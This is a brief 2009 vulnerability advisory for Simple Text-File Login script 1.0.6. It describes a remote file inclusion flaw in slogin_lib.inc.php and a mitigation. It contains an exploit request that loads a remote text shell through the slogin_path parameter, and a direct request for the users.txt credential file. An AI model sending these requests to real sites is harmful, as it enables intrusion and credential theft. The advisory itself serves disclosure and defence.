vendor:
Simple Text-File Login script
by:
Osirys
4.3
CVSS
MEDIUM
Remote File Inclusion / Sensitive Data Disclosure
94
CWE
Product Name: Simple Text-File Login script
Affected Version From: 1.0.6
Affected Version To: 1.0.6
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Simple Text-File Login script 1.0.6
If $slogin_path is not given, becomes a null variable. Scrolling down the source code, you can see an include of that variable everywhere. Just one of the few vulnerable includes is include_once ($slogin_path . "header.inc.php");. The header.inc.php file, such as all the files of this cms, is in the same dir of slogin_lib.inc.php, so a fix could be just to include the file, without including a variable, which should be null becouse all the files are in the same dir. Exploit: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell] and /[path]/users.txt
Mitigation:
Declare $slogin_path and include the file without including a variable